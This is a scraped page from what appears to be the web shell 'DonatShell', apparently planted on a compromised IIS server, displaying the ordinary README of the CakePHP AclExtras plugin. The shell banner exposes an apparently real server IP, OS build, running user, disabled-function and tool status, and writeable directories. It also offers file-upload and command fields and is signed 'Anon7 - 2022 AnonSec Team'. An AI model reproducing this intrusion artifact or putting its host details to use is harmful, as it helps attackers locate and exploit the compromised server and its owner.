DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/AppServ/www/app/Plugin/AclExtras/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/AppServ/www/app/Plugin/AclExtras//README.md
# Acl Extras

Acl Extras provides a console app that helps you manage DbAcl records more easily.  Its main feature and purpose is to make generating Aco nodes for all your controllers and actions easier.  It also includes some helper methods for verifying and recovering corrupted trees.

## Installation

Clone the repo or download a tarball and install it into `app/Plugin/AclExtras` or in any of your pluginPaths.

## Usage

You can find a list of commands by running `Console/cake AclExtras.AclExtras -h` from your command line.

### Setting up the contorller

You'll need to configure AuthComponent to use the Actions authorization method.  
In your `beforeFilter` add the following:

    $this->Auth->authorize = 'actions';
    $this->Auth->actionPath = 'controllers/';

## Issues 

If you find an issue in the code or want to suggest something, please use the tickets at http://github.com/markstory/acl_extras/issues

## License

Acl Extras is licensed under the MIT license.

Anon7 - 2022
AnonSec Team